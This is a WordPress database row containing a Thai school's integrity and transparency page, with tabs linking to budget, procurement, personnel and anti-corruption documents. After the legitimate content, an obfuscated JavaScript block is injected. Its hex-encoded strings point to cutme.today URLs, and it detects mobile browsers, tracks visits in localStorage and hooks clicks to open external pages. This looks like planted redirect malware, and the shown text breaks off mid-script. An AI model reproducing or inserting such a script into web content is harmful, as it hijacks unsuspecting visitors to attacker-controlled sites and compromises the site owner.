(1492,1,'2025-07-01 09:22:39','2025-07-01 02:22:39','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 